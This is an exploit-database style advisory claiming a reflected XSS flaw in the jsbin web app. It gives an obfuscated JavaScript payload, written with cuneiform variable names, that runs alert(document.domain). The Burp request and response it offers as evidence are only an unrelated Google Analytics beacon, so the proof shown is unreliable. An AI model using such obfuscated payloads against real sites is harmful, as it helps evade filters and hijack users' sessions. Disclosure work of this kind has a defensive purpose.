# Titles: jsbin-web app - XSS Reflected
# Author: nu11secur1ty
# Date: 07/15/2025
# Vendor: https://jsbin.com/
# Software: https://jsbin.com/?css,js,output
# Reference: https://portswigger.net/web-security/cross-site-scripting
## Description:
An attacker can execute malicious JavaScript through the convert function of this app. The root cause is an encoding weakness with insufficient sanitizing. Depending on the scenario, an attacker can try any technique, and when successful can retrieve or display sensitive information for use in further attacks.
[+]Exploit:
```
𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++],
𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀]
+(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀]
+𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+'(alert(document.domain))')()
```
### Burp
```
GET /collect?v=1&_v=j101&a=1533662127&t=event&_s=6&dl=https%3A%2F%2F34.203.44.8%2F%3Fcss%2Cjs%2Coutput&ul=en-us&de=UTF-8&dt=JS%20Bin%20-%20Collaborative%20JavaScript%20Debugging&sd=24-bit&sr=1536x864&vp=1163x652&je=0&ec=button&ea=run%20with%20js&_u=KGBAgEAjAAAAAGAAI~&jid=&gjid=&cid=1833133753.1750669799&tid=UA-1656750-13&_gid=1639340870.1750669799&z=1616538348 HTTP/2
Host: www.google-analytics.com
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Sec-Ch-Ua: "Chromium";v="137", "Not/A)Brand";v="24"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Sec-Ch-Ua-Mobile: ?0
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Sec-Fetch-Storage-Access: active
Referer: https://34.203.44.8/
Accept-Encoding: gzip, deflate, br
Priority: i
```
### Resp:
```
HTTP/2 200 OK
Access-Control-Allow-Origin: *
Pragma: no-cache
X-Content-Type-Options: nosniff
Cross-Origin-Resource-Policy: cross-origin
Server: Golfe2
Content-Length: 35
Content-Security-Policy-Report-Only: script-src 'none'; form-action 'none'; frame-src 'none'; report-uri https://csp.withgoogle.com/csp/scaffolding/ascnsrsgac:163:0
Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to=ascnsrsgac:163:0
Report-To: {"group":"ascnsrsgac:163:0","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/scaffolding/ascnsrsgac:163:0"}],}
Date: Mon, 23 Jun 2025 06:22:09 GMT
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate
Age: 10103
Last-Modified: Sun, 17 May 1998 03:00:00 GMT
Content-Type: image/gif
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
GIF89a
```
# Video:
[href](https://www.youtube.com/watch?v=hqLnC7UTBhU)
# Source:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/jsbin.com)
# Buy me a coffee if you are not ashamed:
[href](https://www.paypal.com/donate/?hosted_button_id=ZPQZT5XMC5RFY)
# Source download
[href](https://nu11secur1ty.github.io/DownGit/#/home?url=https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/jsbin.com)
# Time spent:
00:35:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
nu11secur1ty <http://nu11secur1ty.com/>